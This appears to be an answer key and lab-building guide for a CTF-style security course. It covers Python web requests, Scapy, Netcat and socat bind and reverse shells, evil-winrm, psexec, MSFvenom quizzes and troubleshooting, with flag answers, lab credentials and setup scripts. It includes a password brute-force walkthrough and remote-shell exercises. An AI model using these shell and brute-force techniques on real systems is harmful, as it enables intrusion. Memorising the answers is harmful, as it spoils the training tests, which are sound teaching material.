Answer: HD{Devorda-osilib-turgan-o'rgimchak} | OS{spider-spider-on-the-wall}
Scenario
A page like this must be created in the website's /skanerlash folder. The entries shown as rows are folders, and the flag must be created in any one of them. The folders must be set up honeypot-style, that is, folders continue inside folders: 10 or 20 in each, with that many folders again inside them, repeated 2 or 3 times.
2
Visit the website on port 8080 of the target VM under the /table directory. The table found on the page contains the flag, but each row contains a different letter. Use Python to make a request to this page and parse the response.
Answer: HD{Bu-dunyoning-eng-qiziqarli-jadvali!} | OS{this-is-the-most-interesting-table-in-the-WORLD-}
Scenario
When the website's /table folder is visited, a page laid out like this table must be prepared. The flag must be placed in the table in sequence, and the student has to collect it with a script.
13.6.1. Post Requests and Parameters with Python
1
The page called /basic-post/ on port 8080 of the target server accepts only POST requests. Try sending any POST request to this page to get the flag.
Answer: HD{Tezroq!-bu-flagni-darhol-kiriting!} | OS{Quickly!-enter-this-flag-posthaste!}
Scenario
On the website that was created, visiting the /basic-post/ page should display words like these in Uzbek:
Salom, men faqat POST ma'lumotlarini qabul qiladigan veb-sahifaman. "haady" parametriga har qanday POST ma'lumotlarini yuboring. (In English: Hello, I am a web page that only accepts POST data. Send any POST data to the "haady" parameter.)
The student must send a POST request with the required parameter added (for example, haady=correct_value) to get the flag from the server. If the correct value is sent, the server returns the flag.
2
You can authenticate to the page at port 8080 of the target server called /login-1 with the username 'thobbes' and the password 'leviathan'. Make a POST request to the page with the above credentials to get the flag.
Answer: HD{Bu-kinoyalar-endi-juda-nazariga-tushadigan-bo'lib-bormoqda} | OS{These-puns-are-becoming-preposterous}
Scenario
On the same web server, visiting the page called /login-1 should display the following. The student has to obtain the flag by writing a script. The flag should be shown when the student enters the login and password correctly.
After the student writes and runs a script like this, the flag should be given.
3
You can authenticate to the page at port 8080 of the target server called /login-2 with the username 'rdescartes' and the password 'discourse'... however, the password is followed by the five characters: ! @ # % & in some unknown order. For example, the password might be discourse#!@&%, or it might be discourse%&@!#. Use Python to iterate through all possible POST requests to determine the password, and log in to get the flag.
Answer: HD{Men-bu-kinoyalarni-mukammal-deb-aks-etaman} | OS{I-postulate-that-these-puns-are-perfect}
Scenario
In this CTF task you must authenticate to the target page, but the password ends with special characters that are shuffled and placed in a particular order. Your task is to use Python to send all possible POST requests, determine the correct password, log in, and get the flag. Let me explain how to build and solve this task.
1. Task goal:
You are given the username rdescartes and the password discourse. However, the characters !, @, #, %, & are present at the end of the password, placed in random order. The task is to go through all possible orderings of these 5 characters and determine the correct password. Once you have found the correct password, you authenticate and get the flag.
2. Creating the Python script:
In the script we use Python to generate all possible orderings of the 5 special characters and try each one by sending a POST request. If the correct ordering is sent, the login succeeds and the flag can be obtained.
2.1. Sending the POST request:
URL: http://<target_ip>:8080/login-2
Password: discourse followed by the 5 special characters (we go through all orderings of these characters).
2.2. Writing the Python code:
3. Explanation of the steps:
3.1. Importing the Python libraries:
The requests library is used to send HTTP requests. itertools.permutations generates all possible orderings from the list of special characters.
3.2. Getting all the orderings:
Using itertools.permutations(special_chars) we obtain all orderings of the 5 special characters. This gives 120 orderings (5 items chosen from 5).
3.3. Sending the POST requests:
We append each ordering to the password discourse and send a POST request to the server. If the server's response contains the word "Flag", we have found the correct password.
3.4. Successful login:
If the password is correct, we can obtain the flag. We print the flag to the screen and stop the script.
4. Building the task:
4.1. Creating a page that accepts POST requests with Flask:
In this code, when a POST request is sent to the /login-2 URL, the username and password are checked. If the correct password is sent, the flag is returned.
4.2. Starting the Flask server:
5. Testing:
After starting the Flask server, run the Python script above to send all possible POST requests. Once the correct password is identified, you get the flag.
4
The page on port 8080 of the target server called /bijection accepts an integer value that corresponds to the letter position of the flag. For example:
/bijection?index=0 will return the character 'O'
/bijection?index=1 will return the character 'S'
/bijection?index=2 will return the character '{'
Use your Python skills to create a script that will get the entire flag. Note, that the page will only accept POST requests!
Answer: HD{Xush-xabar...bu-juda-ta'sirli-javob} | OS{touche...that’s-quite-the-impressive-reposte}
Scenario
There will be a /bijection page, and when requests like the /bijection?index=1 shown above are sent to it, it should return the flag, but only via POST requests made by a running script.
13.6.2. Request Header and Non-Text-based Content
1
The directory at port 8080 of the target server called /headers has ten subpages called /headers/1 through /headers/10. Each page has a custom header called "Flag" that contains a portion of the flag. Use Python to piece together all the components of the flag.
Answer: HD{O'n-10-To'qqiz-9-Sakkiz-8-777-O'nBesh-15-To'rt-4-Uch-3-Ikki-Bir-1} | OS{ten-9-eight-777-sicks-5-for-thre33-too-1-}
Scenario
The task itself is written clearly enough.
2
The page at port 8080 of the target server called /object returns a binary that when run, prints out the flag. Use Python to save the binary and then run it to get the flag.
Answer: HD{Qancha_olishni_bilsang,_shuncha_ol} | OS{don’t-byte-off-more-than-you-can-chew}
Scenario
Visiting the /object page downloads a binary file; the student runs it on their own machine, and it then prints the flag.
3
The page at port 8080 of the target server called /about.html contains a list of 30 employees, their email addresses, and their favorite colors. Only one of these users can log in to the page at /login-3. Use Python to determine which user has a valid account by analyzing the responses to your requests. What is the first name of the valid user?
Answer: Damian
Scenario
In this CTF task, you are given a list of the names, email addresses, and favorite colors of 30 employees on the /about.html page on port 8080 of the target server. Only one of these employees is able to log in successfully to the /login-3 page. Your task is to use Python to identify this user and find their first name.
Task goals:
Retrieve the details of the 30 employees from the /about.html page.
Send POST requests to the /login-3 page and analyze the responses.
Identify the correct user and obtain their name.
How can the task be built?
Building this task involves the following steps:
1. Creating the /about.html page:
The /about.html page displays the details of 30 employees. Each employee has a name, an email address, and a favorite color.
Creating the page with Flask:
This Flask code contains the list of 30 employees. They are displayed on the /about.html page.
2. Creating the /login-3 page:
The /login-3 page accepts POST requests and checks the user's authentication. To check against the list of active users, it may ask for the email address and color.
Here the email address alice@example.com and the color blue belong to the correct user. If these details are correct, the login succeeds and the flag is shown.
3. Sending POST requests with Python:
Now we send POST requests to the /login-3 page with Python. We send the email and color for each user to identify the correct one.
Writing the Python script:
4. Explanation:
4.1. Parsing the /about.html page:
We fetch the /about.html page with requests.get(url_about). We extract the employee list from the page with BeautifulSoup and use the find_all() method to get each employee's name, email address, and color.
4.2. Sending the POST requests:
A POST request carrying the email and color is sent for each employee in the list. If the response to the POST request contains the words "Login successful", those details belong to the correct user.
5. How to build the CTF:
Set up the Flask server and use the code above to create the /about.html and /login-3 pages. Give your students the Python code; they must use this script to find the correct user.
6. Result:
After running the Python script and analyzing all the employee data, the correct user's name is identified and access to the flag becomes possible.
13.7.4. Saving Packets with Scapy
1
What function can be used in Scapy to sniff traffic?
Answer: sniff()
2
What parameter to sniff() would you need to provide to capture a total of 3000 packets from the wire?
Answer: count
13.7.7. Sending and Receiving a Response from Scapy
1
Complete the following exercises with the in-browser Kali client.
Send an IP packet to the server listening on port 9876. The IP packet must arrive at the target server with a TTL of 99, and does not need to contain any data.
Answer: HD{Ko'proq_flag_uchun_vaqt_keldi!} | OS{time-to-live?More-like-time-to-FLAG!}
2
Send an ICMP packet to the server listening on port 9876. The ICMP packet should contain the data "Hello, Offsec!".
Send an ICMP packet to the server listening on port 9876. The ICMP packet should contain the data "Hello, Haady!".
Answer: HD{Nega...salom_sizga_ham_muhandis!} | OS{Why...hello-to-you-too...scholar!}
3
Send a UDP packet to the server listening on port 9876.
Hint: The browser-based Kali and the VPN-based Kali require different starting TTL values. Can you figure out why? Use ping to determine how much the TTL is decremented along the route to the target host and adjust your starting TTL accordingly.
Answer: HD{O'ylaymanki_buni_boshqa_joyga_yuborishni_niyat_qilganding_har_holda_flagni_ol!} | OS{I-think-you-meant-to-send-this-elsewhere...have-a-flag-anyway}
4
Send a TCP ACK packet to the server listening on port 9876, with the source port of 22.
Answer: HD{Hey!Sen-SSH-Kabi-Ko'rinmaysan?!} | OS{Hey!You-Dont-Look-Like-SSH?!}
14. Working with Shells
14.1.2
1
Which of the following shells are made for Windows systems? (Enter the letter of the correct answer)
A. sh
B. PowerShell
C. bash
D. terminal
Answer: B. PowerShell
2
Which shell is more commonly found on Free-BSD systems? (Enter the letter of the correct answer)
A. tcsh
B. bash
C. cmd
D. zsh
Answer: A. tcsh
3
Which shell has features from bash, csh, and tcsh? (Enter the letter of the correct answer)
A. cmd
B. bash
C. ksh
D. zsh
Answer: D. zsh
14.2.3
1
Which machine (Windows or Kali) acted as the Netcat server?
Answer: Windows
2
Which machine (Windows or Kali) acted as the Netcat client?
Answer: Kali Linux.
3
On which machine (Windows or Kali) was port 4444 opened?
Answer: Windows
4
What Netcat option sets up a listener (including the -)?
Answer: -l
5
What Netcat option sets up the port (including the -)?
Answer: -p
14.2.6
1
Make a standard Netcat connection with the host on port 555. Press ENTER after the connection is established. The flag is the answer.
Create a standard Netcat connection with the host on port 555. After the connection is established, press ENTER. The flag is the answer.
Answer: NC{Such_Connection} | NC{Mustahkam_Aloqa}
Scenario
The student should connect to some IP over SSH and then exit. After that, once they run nc -nv against the IP, the flag should be given. After running nc and pressing Enter, the IP should be given.
2
Start a Netcat listener on port 4444 and wait a minute for the flag to appear.
Start a Netcat listener on port 4444 and wait one minute for the flag to appear.
Answer: NC{Now_I_Connect_To_You} | NC{Hozir_Sizga_Ulanmoqdaman}
Scenario
After listening on port 4444 with Netcat, the flag should arrive.
3
Connect to a Netcat shell session on the host on port 456. The flag will be in the /nc directory.
Hint: It's not always necessary to use the -e option
Connect to the Netcat shell session on the host on port 456. The flag will be in the `/nc` directory.
Hint: It is not always necessary to use the `-e` parameter.
Answer: NC{Bind_The_Shell} | NC{Shellni_Biriktir}
Scenario
The student connects to the IP with nc; inside there will be the following files, including NC-flag1.txt, and opening that file should reveal the flag.
4
Listen for a Netcat shell on port 567. The flag will be in the /nc directory.
Listen for a Netcat shell on port 567. The flag will be in the `/nc` directory.
Answer: NC{I_Offfer_My_Shell_As_Tribute} | NC{Men_Shellni_Hurmat_Sifatida_Taqdim_Etaman}
Scenario
After a connection is made to port 567 with nc, the flag should appear.
14.2.8
1
To begin this set of exercises, SSH into the exercise host with offensive:security. The IP will be displayed when the host is started.
For example, ssh offensive@192.168.50.22 (security is the password)
After the initial SSH connection, establish another SSH connection from the exercise host to 172.16.53.10 with root:root.
ssh root@172.16.53.10
Make a SOCAT connection with 172.16.53.20 on port 555. The flag will be displayed after pressing the ENTER key in the connection.
To begin these exercises, SSH into the exercise host with the credentials `haady:security`. The IP is displayed when the host is started.
For example:
`ssh haady@192.168.50.22` (password: `security`)
After the initial SSH connection, establish another SSH connection from the exercise host to the IP address `172.16.53.10` with `root:root`.
ssh root@172.16.53.10
Make a SOCAT connection to port 555 on the IP address `172.16.53.20`. The flag is displayed after pressing the ENTER key in the connection.
Answer: SOCAT{Connected_With_SOCAT} | SOCAT{SOCAT_Bilan_Ulanish_Tuzilgan}
Scenario
The student connects to the first IP with SSH, and from inside it must connect to the other IP with SSH as root,
then connect with Socat to port 555 on 172.16.53.20 and receive the flag after pressing Enter.
2
Create a SOCAT listener on port 4444. The flag will be displayed when the remote host establishes a connection.
Create a SOCAT listener on port 4444. The flag is displayed when the remote host establishes a connection.
Answer: SOCAT{TAG_You_Are_It!} | SOCAT{Endi_Sen_O‘yndasan!}
AI
If the students need to use the command socat -d -d TCP4-LISTEN:4444 STDOUT and obtain the flag that way, here I explain how to do it.
1. Using the SOCAT Command
You need to use the following socat command:
This command creates a TCP listener on port 4444 and waits for a connection. When a connection is established, it outputs the flag to STDOUT (that is, to the screen).
2. Adding the Flag
To show the flag only once, the following variant can be used:
3. Showing the Flag in SOCAT
If you want to store the flag in the flag.txt file and are waiting for a connection through socat, you can use the cat command to print the flag to the screen.
-d -d: Runs in debug mode, which shows you each stage of the connection.
TCP4-LISTEN:4444: Waits for TCP connections on port 4444.
fork: Starts a new process for each new connection.
SYSTEM:"cat /root/flag.txt": When a connection is established, outputs the flag via cat /root/flag.txt and sends it to the connection.
4. Guide for the Students
To explain to the students how to connect, you can give the following guidance:
Connecting to the listening system: The students need to connect to port 4444 using Netcat. They can make the connection with the following command:
Getting the flag: After the connection is established, the flag is displayed on the screen automatically.
5. Testing
Start the SOCAT listener and test the connection yourself using Netcat or another tool. Check that the flag displays correctly and that it works successfully for the students.
6. Docker Container for the Students (if Docker is used)
If you use a Docker container, you can place the socat command above in a Dockerfile:
Then you build and run the Docker container:
Summary
In this way, the students can connect on port 4444 and see the flag through SOCAT.
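The listener arrangement described above, built from the options it lists (`TCP4-LISTEN`, `fork`, `SYSTEM:"cat ..."`), as an added example that is not part of the original page. The flag text, the temporary file, port 14444, the `bind=127.0.0.1` and `reuseaddr` options and all function names are assumptions made for the demo.

```bash
#!/bin/sh
# Added example, not from the original page: a lab-side socat listener that
# sends a flag file to every client, and a client that reads it.
# Constructed for the demo: the flag text, the temp directory, port 14444.

# serve_flag PORT FILE: start the listener in the background, print its PID.
# FILE must not contain spaces, commas or colons (socat address syntax).
serve_flag() {
    # TCP4-LISTEN:PORT     wait for TCP connections (the exercise uses 4444)
    # bind=127.0.0.1       demo only: keep the listener off the network
    # reuseaddr            allow an immediate restart on the same port
    # fork                 one child per connection, the parent keeps listening
    # SYSTEM:"cat FILE"    run cat and send its output to the client
    # Adding -d -d would log each connection stage to stderr.
    socat TCP4-LISTEN:"$1",bind=127.0.0.1,reuseaddr,fork \
          SYSTEM:"cat $2" >/dev/null 2>&1 &
    echo "$!"
}

# fetch_flag PORT: print what the listener sends; retry while it starts up.
fetch_flag() {
    fetch_try=0
    while [ "$fetch_try" -lt 5 ]; do
        # -u: one-way transfer from the socket to STDOUT, ends at server close.
        fetch_out=$(socat -u TCP4:127.0.0.1:"$1" STDOUT 2>/dev/null) || fetch_out=
        if [ -n "$fetch_out" ]; then
            printf '%s\n' "$fetch_out"
            return 0
        fi
        fetch_try=$((fetch_try + 1))
        sleep 1
    done
    return 1
}

# run_demo [PORT]: serve a constructed flag, read it with two clients, clean up.
# Returns 2 if socat is not installed, 1 if a client received nothing.
run_demo() {
    command -v socat >/dev/null 2>&1 || { echo "socat not installed" >&2; return 2; }
    demo_port=${1:-14444}
    demo_dir=$(mktemp -d) || return 1
    printf 'DEMO{constructed_flag}\n' > "$demo_dir/flag.txt"
    demo_pid=$(serve_flag "$demo_port" "$demo_dir/flag.txt")
    demo_rc=0
    first=$(fetch_flag "$demo_port") || demo_rc=1
    # A second client only succeeds because of `fork`.
    second=$(fetch_flag "$demo_port") || demo_rc=1
    kill "$demo_pid" 2>/dev/null || true
    rm -rf "$demo_dir"
    printf '%s %s\n' "$first" "$second"
    return "$demo_rc"
}

# Run as: sh flag_listener.sh demo
case "${1:-}" in demo) run_demo ;; esac
```

Without `fork` the listener exits after the first client, so the second read in `run_demo` would come back empty.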
3
Establish a shell connection with SOCAT with 172.16.53.20 on port 456. The flag will be in the current working directory after the connection is made.
Hint: It's not always necessary to use the EXEC option
Establish a shell connection with SOCAT to port 456 on the IP address 172.16.53.20. After the connection is established, the flag appears in the current working directory.
Hint: It is not always necessary to use the EXEC option.
Answer: SOCAT{Bind_With_SOCAT} | SOCAT{SOCAT_Bilan_Bog‘landim}
Scenario
After connecting to port 456 on the IP with SOCAT, the following files will be inside, including SOCAT-Flag-456.txt, and the flag is given after reading it.
4
Start a shell listener with SOCAT on port 567. The flag will be in the current working directory after the connection is made.
Start a shell listener with SOCAT on port 567. After the connection is established, the flag will be in the current directory.
Answer: SOCAT{Here_You_Go!} | SOCAT{Mana_Senga!}
Scenario
14.2.9
1
SSH into the exercise host on port 2222 with the following credentials: offensive:security. The flag located in the offensive account's home directory is the answer.
SSH into the exercise host on port 2222 with the following credentials: offensive:security. The flag is located in the home directory of the offensive account and is the answer.
Answer: SSH{NonDefault_Access} | SSH{Noodatiy_Kirish}
Scenario
14.3.1
1
What needs to be enabled for PowerShell remote commands to work? (Enter the letter corresponding to the answer)
A. PowerCLI
B. Netcat
C. PSRemoting
D. RemotePS
What must be enabled for PowerShell remote commands to work? (Enter the letter corresponding to the answer)
A. PowerCLI
B. Netcat
C. PSRemoting
D. RemotePS
Answer: C. PSRemoting
2
What configuration setting needs to be added before PowerShell remote shells work?
Hint: Even with PSRemoting enabled, this configuration change must be made.
Which configuration setting must be added for PowerShell remote shells to work?
Hint: Even if PSRemoting is enabled, this configuration change must be made.
Answer: TrustedHosts
3
True/False: The configurations need to be made on the remote host as well as the client.
True/False: The configurations must be made on the remote host as well as on the client.
Answer: True
4
Which cmdlet is used to execute a single command on a remote host using PowerShell?
Which cmdlet is used to execute a single command on a remote host with PowerShell?
Answer: invoke-command
5
What cmdlet is used to establish a PowerShell shell to the remote host?
Which cmdlet is used to establish a PowerShell shell to the remote host?
Answer: enter-pssession
6
For the following exercise, rdesktop from your Kali host to the host ending in .79 with offsec:offsec.
Establish a remote PowerShell shell to the host ending in .80 with offensive:security. The flag will be in the offensive's home directory when the task is complete. The flag may take up to one minute to appear.
For the following exercise, connect via rdesktop from your Kali host to the host ending in .79 and enter the credentials haadyN1:haad00.
Establish a remote PowerShell shell to the host ending in .80 using the credentials haady:haad. Once the task is complete, the flag will be in the home directory of the haady account. The flag may take up to one minute to appear.
Answer: SHELLS{PSRemoting_for_Ease} | SHELLS{PSRemoting_Bilan_Qulaylik}
Scenario
The student must connect via rdesktop through the host ending in 79; the Windows password is haady
and connect by running PowerShell as administrator
14.3.2
1
How would we specify a target host with the psexec command? (Enter the letter corresponding to the answer)
A. -ComputerName
B. \\
C. -t
D. --target
How do we specify the target host with the psexec command? (Enter the letter corresponding to the answer)
A. -ComputerName
B. \\
C. -t
D. --target
Answer: B. \\
2
Which version of PsExec needs an interactive session to work?
Which version of PsExec requires an interactive session?
Answer: 2.32
3
True/False: To establish a remote interactive session using psexec, you must use the Windows shell command (cmd).
True/False: To establish a remote interactive session with psexec, you must use the Windows shell command (cmd).
Answer: False
4
Establish a remote shell with the cmd command to the host ending in .80 (offensive:security) from the Windows client ending in .79 (offsec:offsec). When this is completed, a flag will be in the C:\Users\offensive directory. The flag may take up to one minute to appear.
From your Windows client (.79, haad:haad), establish a remote shell to the host ending in .80 (offensive:security) using the cmd command. Once this is complete, the flag will be in the C:\Users\offensive directory. The flag may take up to one minute to appear.
Answer: SHELLS{Connected_With_PSEXec!} | SHELLS{PSEXec_Bilan_Ulandi!}
Scenario
Again the GUI is opened through Windows, and from PowerShell the student must connect to the host ending in 80 and take the flag from the indicated location.
The flag must be placed at Users\haady, and all of the files and folders shown above must be created. The flag is given after reading the file.
14.3.3
1
Which option is used with evil-winrm for the target host? (Enter the letter corresponding to the answer)
A. -i
B. --target
C. -ComputerName
D. \\
Which option is used with evil-winrm to specify the target host? (Enter the letter corresponding to the answer)
A. -i
B. --target
C. -ComputerName
D. \\
Answer: A. -i
2
To begin, ssh into the host that ends in .77 with offensive:security.
Establish an evil-winrm shell from the host ending with .77 to the host ending with .80 using evil:evil for the credentials. The flag will be in the C:\Users\evil\ directory. The flag may take up to one minute to appear.
To begin, SSH into the host ending in .77 using the credentials haady:security.
Using the credentials evil:evil, establish an evil-winrm shell from the host ending in .77 to the host ending in .80. The flag will be located in the C:\Users\evil\ directory. The flag may take up to one minute to appear.
Answer: SHELLS{What_an_Evil_Remote_Shell} | SHELLS{Qanday_Yomon_Remote_Shell}
Scenario
1 The student logs in to the system as Haady
There will be an evil-winrm file
These files will be inside it
and the student connects to the other IP through evil-winrm
and on moving into the evil folder there will be the files shown below, with the flag inside the EvilRM_Flag.txt file.
14.4.1
1
What option is used to display the help menu for MSFvenom? (include the -)
Which option is used to display the help menu for MSFvenom? (include the - character)
Answer: -h
2
What option is used to list all modules for a 'type'? (include the -)
Which option is used to list all modules for a "type"? (include the - character)
Answer: --list
3
What is the 'type' that would fit the description of the kind of system that is being targeted? (For example: Cisco or Android)
Which "type" fits the description of the system being targeted? (For example: Cisco or Android)
Answer: platforms
4
Which option is used to specify the format? (include the -)
Which option is used to specify the format? (include the - character)
Answer: -f
5
Which kind of payload is this: windows/shell_reverse_tcp (staged or stageless)?
What kind of payload is this: windows/shell_reverse_tcp (staged or stageless)?
Answer: stageless
6
Which kind of payload is smaller? (staged or stageless)
Which kind of payload is smaller? (staged or stageless)
Answer: Staged
7
True/False: All payloads used with MSFvenom will already be stable.
True/False: All payloads used with MSFvenom will already be stable.
Answer: false | Noto'g'ri
8
True/False: A Windows payload will work the same on a Linux host.
True/False: A Windows payload works the same way on a Linux host.
Answer: false | Noto'g'ri
9
Go through this section again and do the exercises demonstrated. Were you able to create and connect to the Linux host with your reverse shell? (yes/no)
Review this section again and do the exercises shown. Did you manage to create and connect to the Linux host using a reverse shell? (yes/no)
Answer: Yes
10
Go through this section again and do the exercises demonstrated. Were you able to create and connect to the Windows host with your reverse shell? (yes/no)
Review this section again and do the exercises shown. Did you manage to create and connect to the Windows host using a reverse shell?
Answer: Yes
15. Troubleshooting.
15.2.1.
1
When troubleshooting a specific issue, what should we do when the instructions don't align exactly with what we observe? (Enter the letter corresponding to the answer)
A. Ignore the instructions and keep looking for something that matches
B. Try to understand the underlying goals of the steps and relate them as they apply to our problem
C. Enter the commands exactly as shown in the guide and ignore error messages
D. Consider the problem unsolvable and give up
When solving a specific problem, what should we do when the instructions are not exact? (Enter the letter corresponding to the answer)
A. Ignore the instructions and keep looking for something that matches
B. Try to understand the underlying goals of the steps and work out how to apply them to our problem
C. Enter the commands exactly as shown in the instructions and ignore error messages
D. Consider the problem unsolvable and give up
Answer: B
2
If a guide shows a single network interface in the scenario, that has the name "enp0s3," what interface would that correspond to on our Linux system? (Enter the letter corresponding to the answer)
A. eth0
B. enp0s3
C. Our primary network interface
D. wlan0
Hint: Our system may not always be configured the same way, so looking at what our system is configured with is important.
If the guide shows a single network interface named "enp0s3", which interface does it correspond to on our Linux system? (Enter the letter corresponding to the answer)
Hint: Our system may not always be configured the same way, so it is important to check how our system is configured.
A. eth0
B. enp0s3
C. Our primary network interface
D. wlan0
Answer: C
3
Your job is to get a web server up and running. As you searched how to do this, you came across these instructions. Using your troubleshooting skills, follow these instructions on the exercise host. The flag will be in the offsec home directory when the tasks are completed successfully. If a lock error comes up, run 'sudo kill -9 PID', replacing "PID" with the process ID shown in the error message.
A. Install the lighttpd package by entering "yum install httpd."
B. Modify the configuration file (/etc/lighttpd/lighttpd.conf) to match the following:
server.modules = (
"mod_indexfile",
"mod_access",
"mod_alias",
"mod_redirect",
"mod_accesslog",
)
server.document-root = "/var/www/html"
server.upload-dirs = ("/var/cache/lighttpd/uploads" )
server.errorlog = "/var/log/lighttpd/error.log"
server.pid-file = "/run/lighttpd.pid"
server.username = "www-data"
server.groupname = "www-data"
server.port = 80
accesslog.filename = "/var/log/lighttpd/access.log"
--- Trimmed ---
C. Start the web service by entering "systemctl lighttpd start."
D. Check the IP of the host by entering "ifconfig eth0"
E. Open a browser and enter the IP in the URL box on your Kali host to verify the service is working.
Hint: The instructions are not correct, except for B. Work with the intent of the instructions to complete the desired goal.
You need to get a web server up and running. Follow these instructions and work on the exercise host. If the tasks are completed successfully, the flag will be in the haad home directory. If a "lock error" appears, run sudo kill -9 PID, replacing "PID" with the process ID from the error.
A. Install the lighttpd package with the command yum install httpd.
B. Edit the /etc/lighttpd/lighttpd.conf configuration file to match the following:
server.modules = (
"mod_indexfile",
"mod_access",
"mod_alias",
"mod_redirect",
"mod_accesslog",
)
server.document-root = "/var/www/html"
server.upload-dirs = ("/var/cache/lighttpd/uploads")
server.errorlog = "/var/log/lighttpd/error.log"
server.pid-file = "/run/lighttpd.pid"
server.username = "www-data"
server.groupname = "www-data"
server.port = 80
accesslog.filename = "/var/log/lighttpd/access.log"
C. Start the web service with the command systemctl lighttpd start.
D. Run the command ifconfig eth0 to find the host IP address.
E. Open the browser on your Kali host, enter the IP address in the URL box and verify that the service works.
Hint: The instructions are not correct; only B is correct. Understand the intent of the instructions and work accordingly to achieve the desired goal.
Answer: TROUBLESHOOT{Bu_juda_ko'p_noto'g'ri_qadamlar_edi_lekin_baribir_hal_qildik}
Scenario
In this CTF (Capture The Flag) task, your goal is to find the flag by starting the web server and configuring it correctly. The flag is usually stored in a specific place on the server (for example, in the /home/haad/ directory).
This scenario helps students build their skills by carrying out the tasks of configuring a web server, fixing errors and finding the flag. The scenario consists of the following parts:
---
### **CTF Scenario: Configuring a Web Server and Finding the Flag**
#### **CTF Name:** "Getting the Web Server Running"
#### **Goal:** Students learn basic server administration skills by correctly configuring the `lighttpd` web server, fixing errors and finding the flag.
#### **Flag Location:** Stored in the file `/home/offsec/flag.txt`.
#### **Difficulty Level:** Beginner/Intermediate.
---
### **1. Introduction (instructions for the students)**
**Hello, CTF participant!**
Your task is to find the flag by starting the `lighttpd` web server and configuring it correctly. The flag is stored in the file `/home/offsec/flag.txt`. Follow the instructions below, but be careful, because some of the instructions may be wrong. Complete the task by finding and fixing the errors.
---
### **2. Instructions (Deliberately Incorrect Instructions)**
1. **Installing the Web Server:**
```bash
yum install httpd
```
(Incorrect: this installs Apache; `lighttpd` is needed.)
2. **Editing the Configuration File:**
Configure the file `/etc/lighttpd/lighttpd.conf` as follows:
```plaintext
server.modules = (
"mod_indexfile",
"mod_access",
"mod_alias",
"mod_redirect",
"mod_accesslog",
)
server.document-root = "/var/www/html"
server.upload-dirs = ("/var/cache/lighttpd/uploads" )
server.errorlog = "/var/log/lighttpd/error.log"
server.pid-file = "/run/lighttpd.pid"
server.username = "www-data"
server.groupname = "www-data"
server.port = 80
accesslog.filename = "/var/log/lighttpd/access.log"
```
(Correct: this part is correct, but the students need to learn to edit the file.)
3. **Starting the Web Server:**
```bash
systemctl lighttpd start
```
(Incorrect: the correct command is `systemctl start lighttpd`.)
4. **Checking the Server's IP Address:**
```bash
ifconfig eth0
```
(Correct: this part is correct, but if the `eth0` interface does not exist, the `ip a` command should be used.)
5. **Checking in the Browser:**
Enter the obtained IP address in the browser and check that the web server is running.
---
### **3. Fixing the Errors (solution for the students)**
1. **Installing the Web Server Correctly:**
```bash
yum install lighttpd
```
If `yum` does not work, use `dnf`:
```bash
dnf install lighttpd
```
2. **Starting the Web Server Correctly:**
```bash
systemctl start lighttpd
```
3. **If the Port Is Busy:**
If the port is busy, stop the process with the following command:
```bash
sudo kill -9 PID
```
(Replace PID with the number shown in the error message.)
4. **Checking the IP Address:**
If `ifconfig eth0` does not work, use the following command:
```bash
ip a
```
5. **Finding the Flag:**
Once the web server is running correctly, find the flag in the file `/home/offsec/flag.txt`:
```bash
cat /home/offsec/flag.txt
```
---
### **4. Flag and Achievement**
- **Flag:**
If you complete all the steps correctly, the flag will be as follows:
```plaintext
CTF{web_server_is_ready}
```
- **Achievement:**
For finding the flag you have earned the title "Web Server Configuration Specialist"!
---
### **5. Additional Tips (for the organizer)**
1. **Virtual Machine or Docker:**
Prepare a virtual machine or Docker container for the students. For example, create a Docker container that includes `lighttpd`:
```bash
docker run -it --name lighttpd-ctf -p 80:80 ubuntu
```
2. **Guide and Instructions:**
Distribute a short guide and instructions to the students. They need to know how to connect to the virtual machine or start the Docker container.
3. **Points and Prizes:**
Assign points for each correctly fixed error. For example:
- Installing `lighttpd` correctly: 50 points.
- Configuring the configuration file correctly: 50 points.
- Starting the server correctly: 50 points.
- Finding the flag: 50 points.
4. **Feedback:**
After the CTF ends, collect feedback from the students and evaluate their experience.
---
### **6. Sample CTF Structure**
```
CTF_Web_Server/
│
├── README.txt (instructions for the students)
├── flag.txt (flag file, placed in the /home/offsec/ directory)
├── lighttpd.conf (sample configuration file)
├── start.sh (script that starts the Docker container)
└── hints.txt (additional hints, in case the students struggle)
```
---
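### **7. Sample Script for the Docker Container**
If you use Docker, you can start the container with the following script:
```bash
#!/usr/bin/env bash
# start.sh: start the container, then run the setup steps inside it (not on the Docker host)
set -e
docker run -d --name lighttpd-ctf -p 80:80 ubuntu sleep infinity
docker exec lighttpd-ctf bash -c '
  apt update && apt install -y lighttpd &&
  mkdir -p /home/offsec &&   # the stock ubuntu image has no offsec home directory
  echo "CTF{web_server_is_ready}" > /home/offsec/flag.txt &&
  service lighttpd start'
```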
15.3.1
1
What is the first thing we should do when having an issue executing a program? Enter the letter corresponding to the answer.
A. Look at the error message(s)
B. Add a missing semicolon
C. Change programming languages
D. Ask the closest senior engineer
When a problem occurs while executing a program, what should we do first? Enter the letter corresponding to the answer.
A. Look at the error message(s)
B. Add the missing semicolon
C. Change the programming language
D. Ask the nearest senior engineer
Answer: A
2
Without type casting, can an integer and a string be concatenated in Python (yes/no)?
Without type casting, can an integer and a string be concatenated in Python (yes/no)?
Answer: no
3
What is the word for the set of rules that defines the combinations of symbols that are considered to be correctly structured statements or expressions in a programming language? (Google is your friend)
Hint: A lot of programming errors are the result of the incorrect ______.
What is the set of rules called that defines the combinations of symbols considered to be correctly structured statements or expressions in a programming language? (Google and ChatGPT can help)
Hint: Many programming errors are the result of incorrect ______.
Answer: syntax
4
All programming languages follow basic logic flows. (True/False)
All programming languages use basic logic flows. (True/False)
Answer: True
5
All programs have the same syntax rules. (True/False)
All programs have the same syntax rules. (True/False)
Answer: False
6
To get started, ssh into the exercise host with "offsec:offsec".
Debug the program in /home/offsec/CrazyCode/ to get the flag. Changing the code will result in the flag being different. Be sure not to add/subtract components of the code that will cause the logic to break.
Hint: If you don't receive any errors and still don't get the flag, be sure to inspect the code and determine how the flag should be displayed.
The comment that the line is valid should not be altered. The mod keyword argument must remain unaltered for the script to work properly. The pow() function was changed slightly between versions of Python.
To begin, SSH into the exercise host using the credentials "offsec:offsec".
Fix the errors in the program in the /home/offsec/CrazyCode/ directory and get the flag. Changing the code will result in a different flag. Be sure not to add or remove parts of the code in a way that breaks the logic.
Hint: If you receive no errors and the flag still does not appear, inspect the code and determine how the flag should be displayed.
Do not alter the comment confirming that the code is valid. The `mod` keyword argument must remain unchanged for the script to work properly. The `pow()` function changed slightly between versions of Python.
Answer: TROUBLESHOOT{Kimdir_Mening_Spagettimga_Tegdi!}
Scenario
